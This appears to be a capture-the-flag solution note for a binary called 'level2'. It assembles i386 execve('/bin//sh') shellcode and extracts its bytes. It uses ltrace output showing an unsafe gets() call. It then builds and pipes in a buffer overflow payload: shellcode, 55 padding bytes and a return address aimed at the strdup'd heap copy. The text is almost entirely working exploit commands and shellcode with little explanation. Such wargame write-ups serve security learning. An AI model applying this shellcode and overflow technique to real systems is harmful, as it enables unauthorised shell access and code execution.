
nasm -felf32 shellcode.s -o shellcode.o

ld -o shellcode shellcode.o -m elf_i386

objdump -M intel -d ./shellcode | grep '[0-9a-fA-F]*:' | grep -v 'file' | cut -f2 -d: | cut -f1-7 -d' ' | tr -s ' ' | tr '\t' ' ' | sed 's/ $//g' | sed 's/ /\\x/g' | paste -d '' -s | sed 's/^/"/' | sed 's/$/"/g'
    
    -> \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80

    
ltrace ./level2 
        __libc_start_main(0x804853f, 1, 0xbffff7f4, 0x8048550, 0x80485c0 <unfinished ...>
        fflush(0xb7fd1a20)                                                           = 0
        gets(0xbffff6fc, 0, 0, 0xb7e5ec73, 0x80482b5aaaa   )                         = 0xbffff6fc
        puts("aaaa"aaaa  )                                                           = 5
        strdup("aaaa")                                                               = 0x0804a008
        +++ exited (status 8) +++



python -c "print('\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80' + 55 * 'a' + '\x08\xa0\x04\x08')" > /tmp/sol2

cat /tmp/sol2 - | ./level2